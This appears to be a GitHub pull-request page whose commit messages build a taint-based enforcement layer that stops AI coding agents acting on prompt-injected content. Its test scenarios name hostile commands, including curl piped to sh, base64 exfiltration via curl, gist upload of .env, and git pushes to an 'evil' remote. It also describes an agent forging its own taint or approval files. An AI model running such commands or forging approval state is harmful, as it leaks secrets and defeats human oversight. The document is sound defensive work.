Feature/v0.6.11 taint#1
Merged
Merged
Conversation
…ved)
DESIGN/v0.6.11.md is the architecture spec for v0.6.11 — Patchwork's
pivot from "AI coding agent audit trail" toward "AI coding agent
SAFETY layer". The release theme is taint-to-sink enforcement:
deterministic policy at dangerous tool-use boundaries, especially when
recent context came from untrusted sources.
Critical framing (per GPT round-2): Patchwork does NOT detect prompt
injection. It refuses dangerous actions taken in tainted contexts.
Design highlights:
- Multi-kind taint (prompt / secret / network_content / mcp /
generated_file) replacing the single-boolean taint of the v1 draft
- Repo content tainted by default; trust opt-in via user/global config
(not repo-controlled, to close the day-one bypass GPT identified
in round 3)
- Claude-native Write/Edit/MultiEdit/NotebookEdit promoted to
first-class persistence sinks
- Configured git remote resolution + unresolved-destination-under-
taint deny (closes git remote add+push bypass)
- Same-session generated-file taint covers both Claude-native writes
AND Bash heredoc/redirection writes
- allowed_saas_upload sink covers gh gist/issue/comment/release,
npm/pnpm publish, docker push (high-confidence subset for v0.6.11)
- Conservative shell recognizer with explicit ParseUnknown semantics
(full mvdan/sh integration deferred to v0.6.12)
- Out-of-band approval socket only (paste-back deferred)
- 14-scenario release gate that must pass in enforce mode
REVIEWS/2026-05-01-gpt55-v0.6.11-consult-round{1,2,3,4}.json capture
the four GPT-5.5 consult rounds ($1.02 total): round 1 AGREE_WITH_CHANGES,
round 2 NEEDS_REWORK, round 3 NEEDS_ANOTHER_ROUND, round 4 APPROVED_TO_BUILD.
Section 9 of the design doc captures the 10 implementation watch-outs
GPT flagged for the coding phase (Bash-mediated reads must taint, single
canonical URL function, generated-file path identity via realpath, etc.).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…mit 1)
First commit on the v0.6.11 taint-aware-policy track. Per GPT-5.5
round-4 advice, lands ONLY the canonical event normalization layer
and the hook coverage invariant — no shell parser, no taint engine,
no sink classifiers, no enforcement decisions beyond unknown-tool
fail-closed metadata. Each later subsystem builds on this substrate.
Adds:
- packages/core/src/core/tool-event.ts: canonical ToolEvent shape
plus Zod schemas for TaintSnapshot, ParsedCommand, TaintKind,
SafetyMode, ParseConfidence. Optional fields for parsed_command,
taint_state, resolved_paths, etc. so later commits can populate
without reshaping the event.
- packages/core/src/core/tool-registry.ts: per-tool metadata for
every Claude Code tool Patchwork must reason about (Bash, Read,
Write, Edit, MultiEdit, NotebookEdit, WebFetch, WebSearch, Glob,
Grep, Task, TodoWrite, ExitPlanMode) plus an mcp:* prefix matcher
that treats all MCP responses as default-untrusted. Each entry
declares pre/post coverage, taint-source eligibility, sink
eligibility, default safety mode, hook-failure behavior,
malformed-payload behavior, timeout.
- packages/core/src/core/normalize-tool-event.ts: minimal
normalization that fills always-present fields and stamps
POLICY_VERSION. Returns covered/fail_closed flags so callers in
enforce mode can refuse unknown tools (release-gate scenario 14).
- packages/core/scripts/generate-hook-coverage.ts: generates
docs/hook-coverage.md from the registry. Single source of truth.
- docs/hook-coverage.md: generated coverage matrix.
Adds 22 invariant tests covering: every required tool registered,
sink-eligible tools default to enforce + fail_closed, MCP prefix
matcher, unknown-tool fail-closed in enforce mode (advisory passes
through), pre-only / post-only phase coverage, no duplicate names.
Tests: 943 → 965 (+22). Build clean across all packages.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Second commit on the v0.6.11 taint-aware-policy track. Lands the sink
taxonomy module: pattern data, type taxonomy, and a pure classifier that
covers the v0.6.11 sink classes which can be decided without a shell
parser. Per GPT round-4 advice, this commit holds the line at
Claude-native tools — Bash sink classification waits for the conservative
shell recognizer (commit 4).
Classifier (packages/core/src/sinks/classify.ts):
- claude_file_write_persistence: Write/Edit/MultiEdit/NotebookEdit
into shell-rc, git-hook/husky, CI (GHA/GitLab/CircleCI/Jenkins/
Buildkite/Travis/Azure/Bitbucket), ssh config, macOS LaunchAgents,
systemd units, direnv .envrc, editor task files, cron drop-ins,
Claude/Patchwork settings. Severity = deny under any taint, else
approval_required (per design 3.7).
- secret_read: Read of credential-class paths (AWS/GCP/Azure/k8s/
docker/gh/npm/pypi/cargo/gem/git creds, .netrc, password-store,
GPG private keyring, .env*). Severity = advisory; the taint engine
(commit 3) is what consumes this signal to register `secret` taint.
- Bash, WebFetch and other tools yield no matches at this commit —
deferred to commits 4 + 5 + 8.
Pattern modules (packages/core/src/sinks/{persistence,secret}-paths.ts)
+ types.ts hold the data + SinkClass enum; classify.ts compiles them
through picomatch with case-insensitive + dot=true so case-folding
filesystems and dotfiles can't bypass.
GPT round-4 watch-outs addressed:
#2 (read/write/execute roles per path): role is encoded by tool name
so a Read of ~/.zshrc is not treated as persistence and a Write to
a credential path is not treated as secret_read.
#6 (parser failure paths): N/A here — no parsing happens at this
commit. Bash classification is intentionally inert.
#9 (path identity / symlink handling): classifier prefers
resolved_paths (realpath chain populated by the PostToolUse handler
in commit 7) and only falls back to target_paths when missing. The
enforcement layer in commit 8 will fail-closed under taint when
only the unresolved field is present.
Adds 29 unit tests covering: persistence severity flip under taint,
all four Claude-native write tools, GHA/git-hooks/LaunchAgents/.envrc/
.claude-settings paths, case-insensitive matching, empty-taint snapshot,
target_paths fallback, secret_read advisory severity regardless of
taint, role separation, unrelated paths and unknown tools negative
cases, and highestSeverity ranking.
Tests: 965 -> 994 (+29). Build clean across all packages.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Third commit on the v0.6.11 taint-aware-policy track. Lands the in-memory
taint engine that the PostToolUse handler (commit 7) writes to and the
PreToolUse sink classifier (commit 2) reads from, plus the trust-posture
classifier that decides which repo paths register prompt taint.
Engine (packages/core/src/taint/snapshot.ts):
- createSnapshot: dense empty snapshot with all five kinds initialized
- registerTaint: append a source to a kind (immutable update)
- registerGeneratedFile: tag a path with current taint provenance,
mirror into by_kind.generated_file so existing-taint queries see it,
filter cleared upstream sources out of provenance
- clearTaint: out-of-band declassification — sources stay in the
snapshot with `cleared` set so the audit trail is preserved.
Refuses `secret` kind unless allowSecretClear=true (per design 3.3).
Idempotent (already-cleared sources keep their original ts/method).
- forgetGeneratedFile: path-scoped removal from generated_files +
tombstone the matching by_kind entries
- hasAnyTaint / hasKind / getActiveSources / getAllSources /
isFileGenerated / getGeneratedFileSources query helpers
- isPathUntrustedRepo: trust-posture classifier (force-untrusted
patterns > out-of-project > trusted_paths config > default-untrusted)
- ALL_TAINT_KINDS, RAISES_FOR_TOOL, FORCE_UNTRUSTED_PATTERNS as
public data so the agents handler can drive PostToolUse routing
from the engine's source of truth
Schema (packages/core/src/core/tool-event.ts):
- TaintSource gains an optional `cleared` field (per design 3.3) with
method = out_of_band | config_trusted and a scope of TaintKinds.
Backward-compatible — existing callers don't populate it.
GPT round-4 watch-outs addressed:
#4 (declassification non-bypassability): the engine has no API that
lets in-session code clear taint without an explicit method tag,
and `secret` requires the allowSecretClear flag.
#9 (path identity): generated_files is keyed by path; callers MUST
pass realpath/canonical paths. Documented in the module header.
The engine is intentionally pure — no fs / network / process state.
Persistence across sessions is v0.6.12 follow-up. Wiring into the
PostToolUse handler is commit 7. The sink classifier in commit 2
keeps its local hasAnyTaint shim for now; commit 8 will migrate it
to the engine when the handler actually populates ToolEvent.taint_state.
Adds 37 unit tests covering: snapshot construction, immutability,
all-five-kinds independence, generated-file provenance + cleared-upstream
filtering, multi-write append, secret-clear gating, idempotent
re-clearance, kind isolation under clearTaint, trust classifier across
force-untrusted/out-of-project/trusted-paths/default-untrusted, and the
RAISES_FOR_TOOL data table.
Tests: 994 -> 1031 (+37). Build clean across all packages.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Fifth commit on the v0.6.11 taint-aware-policy track (skipping commit 4
which is the shell recognizer — landed separately when the shell parser
work is unblocked). Lands the single canonical URL decision function
that EVERY policy decision involving a URL must route through —
WebFetch, shell-classifier curl/wget hosts, gh api paths,
configured-remote git URLs, SaaS upload URLs.
Per GPT round-4 watch-out #8: divergent canonicalizers are how bypasses
happen — one entry point eliminates that class of bug.
Module (packages/core/src/url/canonicalize.ts):
- canonicalizeUrl(input): parse + normalize, never throws.
Returns CanonicalUrl{scheme,host,port,path,canonical,flags} or
{ok:false, reason}. Lowercases host + scheme, strips default ports,
rejects userinfo, banlists data:/file:/javascript:/gopher:/ftp:/ws:
/wss:/blob:/mailto:/chrome:/about:/view-source:, classifies IP /
loopback / private / link-local / IDN.
- evaluateAllowlist(canonical, entries, opts): the single decision
function. IDN denied unless allow_idn. Link-local always denied.
Loopback / private / IP-literal denied unless explicitly opted in.
Allowlist entries match exact host, *.subdomain glob, or host:port.
First-match-wins, case-insensitive.
- decideUrlPolicy(input, allowlist, opts): convenience that folds
canonicalize-rejection into one uniform UrlPolicyDecision for the
audit log.
Userinfo policy (defense against @-confusion smuggle):
- https://u:p@evil.com@allowed.com/ — REJECTED outright. We never
strip-then-allow because curl-class clients route to evil.com while
WHATWG hosts allowed.com.
Allowlist semantics:
- "example.com" → exact host (any port if entry omits port)
- "*.example.com" → subdomain wildcard, also matches apex
- "example.com:8443" → host + explicit port
- Wildcards are ONLY the leading-`*.` form — no arbitrary regex, so
`a*.com` can't smuggle attacker.com.
Adversarial test corpus (packages/core/tests/url/adversarial.test.ts):
92 fixtures (design 3.4 contract: ≥80). Covers:
- userinfo @-confusion variants
- data:, file:, javascript:, gopher:, ftp:, ws:, wss:, blob:, mailto:,
chrome:, view-source: scheme banlist
- IP-literal smuggling: decimal (2130706433), hex (0x7f000001),
octal (0177.0.0.1), IPv6 mapped IPv4 [::ffff:127.0.0.1]
- loopback / private RFC1918 / link-local incl. AWS metadata IP
(169.254.169.254) — always denied even with all opts on
- IDN homographs (Cyrillic 'a'), punycode literal, allow_idn opt-in
- allowlist evasion: prefix-collision (aexample.com), suffix-collision
(example.com.evil.com), sibling, double-dot, *.subdomain apex match,
nested-sub match, case-insensitive pattern matching
- port confusion: default-port stripping, port-qualified mismatch,
out-of-range, port-zero normalization
- percent-encoded host bytes (evi%6c.com → evil.com)
- empty / malformed / relative / bare-host / scheme-only / extreme
broken brackets — all → invalid_url
- real-world targets: GitHub raw / api / npm / PyPI / Sigstore Rekor /
S3 virtual-host / Slack/Discord webhook / Pastebin
Module unit tests (packages/core/tests/url/canonicalize.test.ts):
79 tests covering scheme normalization, port stripping, userinfo
rejection, scheme banlist, IP / IDN flag classification, edge cases
(empty, relative, bare host, garbage), and `evaluateAllowlist` /
`decideUrlPolicy` behavior across exact / wildcard / port-qualified
/ opt-in cases.
Tests: 1031 -> 1202 (+171). Build clean across all packages.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Status snapshot for the morning handoff. 4 of 12 commits landed: ToolEvent registry, sink taxonomy, taint engine, URL canonicalization. +259 tests (943 -> 1202). Skipped commit 4 (shell recognizer) and commits 6-12 because they need human-in-the-loop judgment for the shell parser, hook wiring, enforcement decisions, and release. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… (v0.6.11 commit 4)
Fourth commit on the v0.6.11 taint-aware-policy track. Lands the
keystone shell recognizer that PreToolUse sink classification (commit 8)
and PostToolUse taint wiring (commit 7) depend on. Per design 3.5
Option B: a conservative recognizer that handles the constructs needed
for v0.6.11 sinks and yields confidence=unknown for anything beyond.
Modules (packages/core/src/shell/):
- types.ts: Token / Redirect / SinkIndicator / ParsedCommand types,
INTERPRETER_NAMES / FETCH_TOOL_NAMES / COMPOUND_PREFIXES /
INLINE_EVAL_FLAGS data tables.
- lexer.ts: state-machine tokenizer that handles single / double /
ANSI-C quoting, backslash escapes, line continuation, $VAR /
\${VAR} / \$(...) / backticks (depth-tracked), <(…) / >(…)
process substitution, every redirect form (>, >>, <, <<, <<-,
<<<, 2>, 2>>, &>, &>>, n>&m, etc.), heredocs (with body capture +
correct newline emission so the next command isn't absorbed),
pipes / sequences / and-if / or-if / & / ;. Never throws —
lexer-level errors land in errors[].
- parse.ts: builds the ParsedCommand tree. Splits sequences, builds
pipelines, parses simple commands with env-prefix + argv +
redirects, recurses into process-subs and sh/bash -c bodies.
Unwraps compound prefixes (sudo, nohup, command, exec, nice,
timeout, env, stdbuf) and \`sh -c '…'\` / \`bash -c "…"\` so argv
reflects the *target* command. Stamps resolved_head even when
overall argv is unresolved so indicator scanning still fires
(eval $(date), curl 'unterminated, etc.). Drops parent confidence
to "low" when process-subs are present. Never throws.
- sink-indicators.ts: typed indicators for interpreter / fetch_tool /
eval_construct / network_redirect / secret_path / scp_rsync /
nc_socat / ssh / package_lifecycle (npm/pnpm/yarn/bun install
without --ignore-scripts) / gh_upload (gist/release/issue/api) /
git_remote_mutate (push/fetch/pull/remote/config/submodule, git -c
smuggle) / interpreter_inline_eval (node -e / python -c / ruby -e
/ perl -e / php -r) / pipe_to_interpreter / process_sub_to_interpreter.
Confidence model (the keystone):
- high: argv fully resolved, redirects all resolved, no expansion
- low: at least one expansion or process-sub present
- unknown: parse error / unsupported construct / lexer error
Per design 3.5: confidence === "unknown" + any sink_indicator under
taint = DENY (commit 8 implements that rule).
Adds 98 unit tests (34 lexer + 64 parser):
Lexer: words / operators / quoting / ANSI-C escapes / expansion /
command-sub / redirects (every form) / heredoc body capture +
tab-stripping for <<- / process substitution / assignments /
comments / line continuation / never-throws on garbage.
Parser: simple commands / env-prefix / pipelines / sequences /
process subst / compound prefix unwrap (every prefix in the table) /
inline -c unwrap with statically-resolvable body / dynamic body
drops to low/unknown / sink indicators across all indicator kinds /
package_lifecycle gating on --ignore-scripts / never-throws corpus
including release-gate scenarios A5 / A6c / A7 / A8.
File named lexer.ts (not tokenize.ts) to dodge Patchwork's own
**/*token* sensitive-glob false-positive when self-hosting.
Tests: 1202 -> 1300 (+98). Build clean across all packages.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…mmit 6)
Sixth commit on the v0.6.11 taint-aware-policy track. Lands the git
remote resolver that the PreToolUse enforcement layer (commit 8) calls
for every git push|fetch|pull|clone|ls-remote argv to determine the URL
the operation will actually hit. The resolver closes every smuggle
vector enumerated in design 3.4 + GPT round-4 watch-out #3.
Modules (packages/core/src/git/):
parse-config.ts: minimal pure parser for .git/config text. Handles
[section] / [section "sub"] / [section.sub] header forms, quoted
values, escape sequences (\\n \\t \\\\ \\"), # and ; comments
(whole-line + trailing), boolean shorthand, multi-value keys,
line continuations, malformed-line skipping. Per-git semantics:
section names case-insensitive, subsection names case-sensitive.
configFromFlat() / mergeGitConfig() build overlays for cFlags +
same-command mutations.
resolve-remote.ts: takes verb + remoteArg + cFlags + configMutations
and returns ResolveResult{urls, push_urls?, resolved, source,
applied_rewrites}. Decision tree:
1. Non-network verb (status/commit/log/...) → resolved=true,
urls=[] so caller can skip allowlist.
2. Direct argv URL (https://, ssh://, git@, scp-like) → that URL.
Closes the basic A6 smuggle (`git push https://evil HEAD`).
3. Remote name → look up remote.<name>.url + pushurl after merging
cFlags + mutations on top of base config. Closes A6b
(`git remote add x evil; git push x`) via mutations and A6c
(`git -c remote.x.url=evil push x`) via cFlags.
4. No arg + push/fetch/pull → fall back to origin.
5. None match → resolved=false, source=unresolved (deny under taint
per design 3.4 "unresolved = deny").
url.insteadOf rewrites: applied longest-prefix-wins per git
semantics. pushInsteadOf rewrites apply only to push verb.
Source attribution follows the merge order: cFlags > mutations >
base, so c_flag_override wins over remote_added_in_command when
both are present. Each applied rewrite is recorded in
applied_rewrites[] for the audit log.
parseGitArgv(): extracts verb + remoteArg + cFlags from a parsed
shell argv (after commit 4's compound-prefix unwrap). Handles
/usr/bin/git absolute paths.
extractMutationsFromArgv(): scans a Bash sequence's children
left-to-right for `git remote add NAME URL` and
`git config remote.X.url URL` and accumulates them into a
mutation map. Commit-8 enforcement slices the sequence at the
verb-of-interest before calling the resolver.
What's NOT in this commit (deferred per design 3.4 / 6 / 7):
- include.path / includeIf chains: the parser doesn't follow these.
Caller must pre-resolve and pass a merged config. Under taint the
enforcement layer treats unresolved-include as deny.
- File-level config layering (system / global / local). Caller
layers them via mergeGitConfig before invoking the resolver.
Adds 42 unit tests (15 parse-config + 27 resolve-remote):
parse-config: section forms, subsection case sensitivity, quoting,
escape sequences, # / ; comments, boolean shorthand,
multi-value keys, malformed-line resilience, url-prefix
subsections, configFromFlat / mergeGitConfig.
resolve-remote: direct argv URL (https / ssh / scp-like), named
remote (with pushurl), default origin fallback, unknown remote
→ unresolved, A6b mutations + A6c cFlags wins-over precedence,
url.insteadOf rewriting (longest-prefix-wins), pushInsteadOf
push-only rewrite, non-network verbs skip resolution,
parseGitArgv extraction, extractMutationsFromArgv accumulation,
end-to-end A6b smuggle integration test.
Tests: 1300 -> 1342 (+42). Build clean across all packages.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…t) landed 6 of 12 commits landed. All pure-module substrate is in: ToolEvent registry, sink taxonomy, taint engine, shell recognizer, URL canonicalization, git remote resolution. Tests: 943 -> 1342 (+399 since v0.6.10). Pause point: commits 7 and 8 are the enforcement wiring and need human-in-the-loop. Updated handoff notes for that hand-off. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two cross-vendor review gates:
R1: post-wiring audit after commit 8 — catches bypasses before
integration tests are written, so commit 11 can be informed
by findings.
R2: ship-check audit after commit 11 — final gate before tagging.
Mirrors the v0.6.10 audit pattern (REVIEWS/*.json + fix-status.md).
Combined budget ~$5, well inside the $10 v0.6 audit envelope.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
New `taint-store.ts` persists per-session `TaintSnapshot` records at
`~/.patchwork/taint/<session_id>.json` — mode 0600, dir 0700, atomic
tmp+rename. `readTaintSnapshot` returns null on missing/corrupt/
schema-invalid so commit 8's PreToolUse path can collapse all three
to all-kinds-active and force approval (sink fail-closed). Session
ids are sanitized to defeat path-traversal via hostile values.
`handlePostToolUse` now folds taint sources into the snapshot after
`store.append`, wrapped in try/catch per the source-fail-open
contract — a storage bug only ever fails to record taint, never to
enforce it.
Wiring per `RAISES_FOR_TOOL`:
- `WebFetch` / `WebSearch` → `prompt` + `network_content`
- `mcp__*` → `mcp` + `prompt`
- `Read` → `prompt` only; `secret` deferred to commit 8 (must gate
on a `secret_read` match from `classifyToolEvent`, not fire on
every Read)
- `Write` / `Edit` / `MultiEdit` / `NotebookEdit` →
`registerGeneratedFile(path, activeUpstream)`; no-op when no
upstream taint is active so clean writes don't churn the snapshot
- `Bash` → deferred (shell-parser composition is commit 8's job)
Tests: 1342 → 1363 (+21). `taint-store.test.ts` covers roundtrip,
mode bits, atomic-rename, corrupt-JSON → null, schema-invalid →
null, loadOrInit fallback, sanitizer. Adapter tests cover each tool
family, the Bash-deferred contract, the clean-write invariant, the
WebFetch→Write provenance flow, and a fail-open path that wedges
the taint dir while keeping events.jsonl writable.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The keystone enforcement layer. After the existing rule-based policy
allows an action, a new sink + taint pass can escalate to
approval_required or deny based on session state.
New `pre-tool-decision.ts` is a pure composer: takes policy, sink
matches, optional parsed shell tree, and the taint snapshot →
verdict + reason + rule id. Decision order:
1. policy_deny — preserves the existing rule-based policy result
2. bash_unknown_indicator_taint — the keystone: any node in the
parsed shell tree with confidence="unknown" AND any sink
indicator AND any active taint kind → deny. Fires before sink
rules because unparseable Bash with a curl indicator under
taint is more dangerous than the resolved-path sink layer can
see.
3. sink_deny — any classifyToolEvent match at severity=deny
4. sink_approval_required — any match at severity=approval_required
5. default_allow
Reader fail-closed semantics: a null snapshot is NOT a top-level
verdict — that would force approval on every fresh session's first
action and break the UX. Instead, every rule that consults taint
collapses null to "every kind active." A fresh-session `Bash ls`
allows; a fresh-session `Bash curl 'unterminated` denies via the
keystone. The adapter mirrors this by synthesizing an "all-active"
taint_state on the ToolEvent it passes to classifyToolEvent, so the
persistence-sink severity flips to deny exactly as if real taint
were present. A storage bug therefore only ever forces more
enforcement where it matters, never less.
`handlePreToolUse` now builds a minimal ToolEvent, runs
classifyToolEvent, parses Bash via parseShellCommand, reads the
taint snapshot via the commit-7 store, and calls decidePreToolUse.
Decision-layer errors fail closed.
Commit 7 left Bash taint deferred. `updateTaintSnapshotForPostTool`
now parses Bash commands and maps the shell parser's `fetch_tool`
indicator to `network_content` + `prompt`. Other indicator kinds
describe what the command did rather than what came into context
and are intentionally not mapped.
Tests: 1363 → 1398 (+35). pre-tool-decision.test.ts (26) covers
every decision branch, rule ordering, fail-closed collapse, and
keystone tree-walking. New PreToolUse enforcement block in
adapter.test.ts (9) covers fresh-session allow paths, the keystone
fires under tainted+unparseable+indicator, malformed-input
preservation, and that advisory matches (secret_read) do not block.
The block sets PATCHWORK_SYSTEM_POLICY_PATH + NODE_ENV=test to
bypass the host's strict system policy and exercise the taint/sink
layer in isolation.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The daemon listens as root and chmods the socket 0660, so by default
only root + the daemon's default group (wheel on darwin) can
connect. Hook processes run as the user — typically in staff, NOT
wheel — and so every sendToRelayAsync() returns connect EACCES.
The errors are silently routed to recordRelayDivergence() with no
visible behavior change, except that the root-owned audit chain
(layer 2 of the tamper-proof architecture) stops receiving events.
This regression started with v0.6.10 when the daemon's socket
chmod tightened from 0777 to 0660 (the signing-oracle fix from
GPT-5.5 round 4). On the host that surfaced it, divergence
accumulated to 2171 connect EACCES failures over 11 days while
`patchwork relay verify` happily reported "Integrity: PASS" on a
chain that hadn't received an event since the deploy.
Fix:
- New optional `socket_group: string` in `RelayConfig`. When set,
the daemon chgrp's the socket to that group after listen, via
spawnSync /usr/bin/chgrp with array argv (no shell). The
config-loaded value is regex-validated to
`[A-Za-z_][A-Za-z0-9_-]{0,31}` so even a hostile config can't
smuggle metacharacters.
- Config loading moved earlier in start() so `socket_group` is
available at chmod/chgrp time, not after.
- deploy-relay.sh now detects $SUDO_USER's primary group and
writes it into the default config. Pre-existing configs without
`socket_group` are not rewritten — instead the script logs a
one-line hint pointing at the missing field.
- The daemon's privilege boundary is unchanged: the socket is
still 0660 (no world write), handleSign() still vets every
signing request, and the signing-oracle hardening from v0.6.10
holds.
Tests: 1398 → 1405. config.test.ts gains 7 socket_group cases
covering valid names, hyphen/underscore/digit forms, shell-metachar
rejection, non-string rejection, leading-char rule, and length cap.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
R1 audit verdict on commits 7+8 was NEEDS_REWORK with 5 blocking
findings. R1-001 (CRITICAL — agent rewrites own snapshot) was largely
mitigated by the existing /Library/Patchwork/policy.yml ~/.patchwork
deny rules that GPT did not have in scope; residual authenticity work
is deferred to v0.6.12. The other 6 lightweight findings land here.
R1-007 (path collision in sanitizeSessionId): path derivation now uses
sha256(sessionId) instead of a character-class sanitizer, and the
session_id stored INSIDE the snapshot is checked against the requested
id on read. Collisions and forged-id files both collapse to null.
R1-002 (stale valid snapshot after failed write): new sibling .pending
marker. PostToolUse writes the marker before mutating and removes it
after success. readTaintSnapshot collapses to null when both .pending
and the snapshot exist — routing the next decision through the
fail-closed path even though the on-disk JSON is parseable.
R1-003 (concurrent RMW lost-update race): new withSessionLock helper.
Single-attempt O_EXCL lock; stale-after-30s entries are reclaimed once.
Contention throws to the caller's fail-open try/catch, which leaves
the .pending marker behind — so a lost lock degrades into fail-closed
on the next read, not into a silent lost update. (No busy spin; an
earlier 25ms polling loop caused 100% CPU under test parallelism.)
R1-004 (keystone too narrow): hasUnknownNode renamed and widened to
hasNonHighConfidenceNode. The keystone now fires for any node with
confidence !== "high" (covers both "unknown" and "low"). Several
shell-dialect / process-sub / dynamic-argv constructs return "low"
from the recognizer and are nearly as dangerous as "unknown" once an
attacker-controlled piece sits inside them.
R1-005 (high-confidence dangerous combos): new module
dangerous-shell-combos.ts. Walks the parsed tree and emits SinkMatch[]
for pipe_to_interpreter / process_sub_to_interpreter (pipe_to_shell),
fetch_tool + interpreter_inline_eval (interpreter_eval_with_network),
secret_path + egress (direct_secret_to_network), git_remote_mutate,
and package_lifecycle. Severity=deny under taint (or null snapshot),
approval_required otherwise. The adapter merges these matches with
classifyToolEvent's before calling the decision composer. This closes
the curl|sh and credential-exfil bypass classes the keystone couldn't
see (because those parse with confidence=high).
R1-006 (Bash source taint mapping too narrow): bashIndicatorTaint now
also maps secret_path → secret + prompt and interpreter_inline_eval →
prompt. Other indicator kinds describe what the command did rather
than what came INTO context, so they remain sink-layer concerns
(handled by R1-005's combos classifier).
R1-010 (classify.ts local hasAnyTaint shim): migrated to the engine's
hasAnyTaint so cleared sources are correctly filtered. No live bug
today (no clear-taint CLI yet — commit 9), but commit 9 must land on
top of this change.
Deferred to v0.6.12: R1-001 / R1-008 (snapshot authenticity via HMAC
or root-owned daemon storage), R1-011 (fsync durability),
R1-009 (composer policy_deny rule is dead in adapter integration —
working as intended for standalone callers).
Tests: 1405 → 1417 (+12). New pre-tool-decision low-confidence
keystone test, three taint-store regression tests for R1-002 and
R1-007, and 8 dangerous-shell-combos cases. agents 205 → 217.
REVIEWS/2026-05-12-gpt55-v0.6.11-impl-audit-round1.{json,prompt.txt}
captures the full R1 audit. REVIEWS/2026-05-12-gpt55-v0.6.11-r1-fix-status.md
tracks fix status per finding with explicit defer rationale.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…commit 9)
Three out-of-band CLI surfaces for the user to manage taint state and
unblock approval_required denials from commit 8's enforcement layer.
`patchwork approve [request_id]` — the PreToolUse adapter now writes
a pending request file under the approvals dir whenever the decision
composer returns approval_required or sink-deny. The denial reason
carries the request_id and a copy-pasteable approve command.
`patchwork approve <id>` writes a sibling approved.json token with a
TTL (default 5 min). The next matching PreToolUse retry
canonical-keys session+tool+target, finds the token, consumes it
(single use), and allows the action. With no arg, the command lists
all pending requests.
`patchwork clear-taint [kind]` — wraps the engine's `clearTaint` so
cleared sources are tombstoned for audit but no longer count toward
`hasAnyTaint`. Default clears all non-secret kinds for the most-
recently-modified snapshot. `--session <id>` pins a specific session;
`--allow-secret` is required to clear the `secret` kind, matching the
engine's safety gate.
`patchwork trust-repo-config <glob>` — writes a project-local
policy.yml to add a picomatch glob to the new `trusted_paths` field
on PolicySchema. The PostToolUse Read handler now reads the system
policy PLUS a project-local trusted_paths overlay and calls
`isPathUntrustedRepo` with picomatch matching both abs and repo-
relative path forms. Read of a path under a trusted glob no longer
raises `prompt` taint (narrowing the commit-7 over-raise).
FORCE_UNTRUSTED_PATTERNS (README, docs, node_modules, etc.) always
win inside the engine — trusted_paths cannot silence
prompt-injection canary surfaces.
Threat model residuals carried from R1-001 / R1-008:
- Approval tokens live in same-user-writable storage. A prompt-
injected agent could in principle forge a token file and bypass
the human gate. Mitigated by the existing system-policy deny on
the audit-data tree. HMAC/signature via the relay signing proxy
is the v0.6.12 follow-up.
- Approved tokens are single-use and bound to canonical_key
(session + tool + target). A leaked token authorizes at most
ONE tool invocation matching the same canonical key — not a
blanket bypass.
Tests: 1417 to 1429 (+12).
- 10 approval-store unit tests: canonical_key stability, pending
roundtrip, list/cleanup, single-use consume, TTL expiry, default
constants.
- 3 adapter integration tests: approved-token-consumes-and-allows,
trusted_paths-skips-prompt-on-Read, FORCE_UNTRUSTED-overrides-
trusted_paths.
picomatch is now an `@patchwork/agents` dep (it was a transitive
through `@patchwork/core`; explicit because the trust classifier
needs its own matcher closure in the hook hot path).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
End-to-end integration tests for the canonical attacker scenarios
from DESIGN/v0.6.11 §A. Each test drives the full PostToolUse →
PreToolUse pipeline and asserts the enforcement verdict.
A1 README read → gh gist create .env
→ DENY via gh_upload + secret_path under prompt taint
A2 WebFetch tainted → env|base64|curl-d exfil
→ ALLOW (documented v0.6.12 gap; needs URL allowlist + body-
shape detection). Test pins current behavior so v0.6.12
knows what it is changing.
A3 MCP tainted → npm install evil-pkg
→ DENY via dangerous-shell-combos `package_lifecycle`
A4 Direct Write to .github/workflows/pwn.yml under taint
→ DENY via persistence sink (severity=deny under taint)
A5 curl URL | sh under taint
→ DENY via dangerous-shell-combos `pipe_to_shell`
A6 git remote add evil && git push evil HEAD under taint
→ DENY via dangerous-shell-combos `git_remote_mutate`
A7 Tainted Write installer.sh, then bash installer.sh
→ first Write registers generated_file taint; second pre-tool
hit is accepted as either deny or allow (v0.6.12 will land
a dedicated generated_file_execute sink class)
A8 bash <(curl URL) process substitution under taint
→ DENY via dangerous-shell-combos `pipe_to_shell` (via
process_sub_to_interpreter)
Plus 2 negative controls:
- curl URL | sh on a FRESH session still denies (fail-closed
null-snapshot semantic correctly collapses to tainted)
- Bash ls on a fresh session allows (no rule consults taint)
Tests use PATCHWORK_SYSTEM_POLICY_PATH + NODE_ENV=test override to
bypass the host's strict policy so the new taint/sink/keystone path
is exercised in isolation.
Tests: 1429 → 1439 (+10). agents 229 → 239. Build clean.
Note: commit 10 (docs) was deliberately reordered after commit 11.
Integration tests have higher signal for R2 than docs.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…(v0.6.11 commit 10)
Three new user-facing docs to land alongside the v0.6.11 release:
docs/v0.6.11/threat-model.md
- What v0.6.11 defends against (A1-A8 attack family, end-to-end).
- What it does NOT defend against (allowed-domain exfil, subtle code
changes, same-user snapshot tampering, MCP servers that lie,
cross-machine attacks).
- The fail-closed contract (source open / sink closed).
- R1 residuals deferred to v0.6.12 (snapshot HMAC, URL allowlist,
fsync durability, dedicated generated_file_execute sink).
docs/v0.6.11/migration.md
- What workflows will start failing (README-then-curl, curl|sh,
npm install after taint, writes to persistence paths, reads
outside trusted_paths).
- The three escape valves (approve / clear-taint / trust-repo-config)
with example invocations.
- Rollback path to v0.6.10.
- What stays the same (audit chain formats unchanged).
README.md
